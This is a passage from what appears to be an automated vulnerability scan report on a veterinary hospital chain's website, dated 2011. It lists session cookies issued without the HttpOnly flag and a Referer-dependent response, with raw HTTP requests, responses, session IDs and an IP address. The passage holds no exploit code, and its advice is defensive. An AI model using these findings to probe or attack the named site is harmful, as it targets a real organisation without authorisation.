GET /hanson/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:51:48 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=v2putd7q3251oms7i32uuk9as6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

5.2. http://www.vcahospitals.com/hanson/offer.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:51:40 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=j1fqeocn1q0uhv2hk1geg4cm22; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

5.3. http://www.vcahospitals.com/main/offer  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:03:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3qhitggrmrfo3b1eptve2npsb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

5.4. http://www.vcahospitals.com/main/offer/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A6830C2B-D8F4-43F2-B95E-78C277FCCFF2&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d040e6353a7ea37e6930856fe2e96ffd3%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=a7e84c5a5824b2f3bfa388c2289ad10b&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d61B79C48-C062-46F9-ABB6-C9F2C04EB7C7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d577d155ccfdadada67e9689c8e906f7c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253d040e6353a7ea37e6930856fe2e96ffd3%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:13:48 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9fa7nr5r6l675dmq1d4gnmpmh2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

5.5. http://www.vcahospitals.com/main/offer/thank-you.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=89CA6527-34F5-44F5-9FE6-1408D41DED87&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=0a9f236de16091436621ac3ecb3014ab&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC5E58271-0599-4DCE-A64E-4093BAC4AD11%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d3f9b848b2f0d1b6547ef64f5b4be7af5%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d552C3BF2-B50A-4487-9212-B5A1CFEBF63B%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de47593670de12e47b4fa1e9df57adad6%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d79086EA1-6374-4E83-A33A-DCBB6D3E16CA%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253db15cfbc2e8b9d5050f6de59c6ed8b5b1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com
Pragma: no-cache
Content-Length: 3685

fname=&lname=&addr=&city=&state=AZ&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=31c82c3543a452dc1200540d59f0157f&guid=0AD96EEC-57E3-4BB0-B188-1922AB63F2B0&referer=&uri=h
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:10:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=mu2hdob1gobie78vsadtqvdr76; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3161
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

5.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:40 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ujbf7feteup2muqgmimolpdqs6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

6. Referer-dependent response  previous  next
There are 5 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



6.1. http://www.vcahospitals.com/hanson/appt.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Request 1

GET /hanson/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:41 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
